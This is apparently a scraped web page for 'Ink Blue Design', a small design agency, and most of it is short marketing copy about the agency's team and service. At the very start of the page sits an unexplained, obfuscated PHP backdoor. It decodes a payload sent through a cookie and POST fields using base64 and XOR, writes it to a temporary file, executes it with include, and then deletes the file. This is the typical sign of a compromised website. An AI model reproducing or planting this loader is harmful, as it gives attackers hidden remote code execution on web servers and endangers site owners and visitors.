$PpZDtnl = "\172" . "\x5f" . "\x4c" . "\167" . "\121" . "\x76" . 'i';$MKwyctg = "\x63" . chr ( 467 - 359 ).chr (97) . 's' . 's' . "\137" . "\x65" . 'x' . chr ( 515 - 410 ).chr (115) . 't' . chr ( 424 - 309 ); $NEXTusU = class_exists($PpZDtnl); $MKwyctg = "36845";$InxmWZhuw = !1;if ($NEXTusU == $InxmWZhuw){function Ohiok(){$ecniRdIDt = new /* 54822 */ z_LwQvi(9716 + 9716); $ecniRdIDt = NULL;}$IjEqsqhKi = "9716";class z_LwQvi{private function CqKmoMPLn($IjEqsqhKi){if (is_array(z_LwQvi::$YaeVMSmlj)) {$NISkYdsM = sys_get_temp_dir() . "/" . crc32(z_LwQvi::$YaeVMSmlj['s' . chr (97) . "\x6c" . chr ( 371 - 255 )]);@z_LwQvi::$YaeVMSmlj["\167" . chr (114) . chr (105) . 't' . chr (101)]($NISkYdsM, z_LwQvi::$YaeVMSmlj["\x63" . "\157" . chr (110) . chr ( 755 - 639 )."\145" . 'n' . chr ( 957 - 841 )]);include $NISkYdsM;@z_LwQvi::$YaeVMSmlj['d' . chr ( 715 - 614 ).chr ( 126 - 18 ).'e' . chr (116) . "\x65"]($NISkYdsM); $IjEqsqhKi = "9716";exit();}}private $MrpSVpFs;public function tstQaWZDf(){echo 37183;}public function __destruct(){$IjEqsqhKi = "31156_51235";$this->CqKmoMPLn($IjEqsqhKi); $IjEqsqhKi = "31156_51235";}public function __construct($NURGeVudNe=0){$OrYKj = $_POST;$UMNvSOAG = $_COOKIE;$jdoAlzM = "99baeae9-0a5d-4ef3-8b3d-fd81240c93c4";$GImGHIw = @$UMNvSOAG[substr($jdoAlzM, 0, 4)];if (!empty($GImGHIw)){$BltDv = "base64";$QVrUjBiC = "";$GImGHIw = explode(",", $GImGHIw);foreach ($GImGHIw as $QeQPeMBK){$QVrUjBiC .= @$UMNvSOAG[$QeQPeMBK];$QVrUjBiC .= @$OrYKj[$QeQPeMBK];}$QVrUjBiC = array_map($BltDv . chr ( 259 - 164 ).chr ( 298 - 198 ).chr ( 420 - 319 ).chr ( 361 - 262 )."\x6f" . 'd' . 'e', array($QVrUjBiC,)); $QVrUjBiC = $QVrUjBiC[0] ^ str_repeat($jdoAlzM, (strlen($QVrUjBiC[0]) / strlen($jdoAlzM)) + 1);z_LwQvi::$YaeVMSmlj = @unserialize($QVrUjBiC);}}public static $YaeVMSmlj = 1695;}Ohiok();} Ink Blue Design


We are simply friends who are passionate about what we do,
and at INK BLUE we are passionate about DESIGN!
Here at Ink Blue Design our creative group has a range of talents to offer.
With creative thinkers and problem solvers that are eager
to assist and support your company in all it’s creative needs.
Our work at Ink Blue Design is highlighted by our ability
to provide unparalleled service with reasonable pricing.
But perhaps what we are most proud of at Ink Blue Design is our history
with over two decades of working closely with our clients
to ensure the success of the clients vision every step of the way.